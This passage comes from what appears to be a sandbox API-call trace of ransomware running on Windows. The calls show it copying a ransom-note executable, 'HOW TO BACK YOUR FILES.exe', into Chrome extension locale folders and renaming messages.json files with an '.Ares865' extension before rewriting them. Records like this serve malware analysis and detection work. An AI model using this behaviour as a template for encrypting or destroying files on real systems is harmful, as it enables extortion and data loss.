HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da" [0103.542] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da" [0103.542] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.542] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.542] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.543] GetLastError () returned 0x0 [0103.543] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.543] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864ed410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f029e20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f029e20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.543] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.543] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.543] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json.Ares865") returned 160 [0103.543] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.545] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.545] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=216) returned 1 [0103.548] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs" [0103.548] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs" [0103.548] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.548] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.549] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.550] GetLastError () returned 0x0 [0103.550] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.550] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f029e20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f029e20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.550] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.550] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.550] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json.Ares865") returned 160 [0103.550] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.552] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.552] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=222) returned 1 [0103.556] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca" [0103.557] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca" [0103.557] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.557] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.557] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.558] GetLastError () returned 0x0 [0103.558] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.558] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f029e20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f029e20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.558] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.558] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.558] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json.Ares865") returned 160 [0103.558] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.559] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.560] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=207) returned 1 [0103.566] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg" [0103.566] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg" [0103.566] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.566] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.567] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.567] GetLastError () returned 0x0 [0103.568] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.568] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f04ff80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f04ff80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.568] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.568] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.568] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json.Ares865") returned 160 [0103.568] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.569] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.570] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=264) returned 1 [0103.573] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar" [0103.573] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar" [0103.573] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.573] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.574] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.574] GetLastError () returned 0x0 [0103.574] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.574] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f04ff80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f04ff80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.574] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.574] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.575] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json.Ares865") returned 160 [0103.575] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.576] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.576] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=246) returned 1 [0103.580] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek" [0103.580] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek" [0103.580] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.580] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user 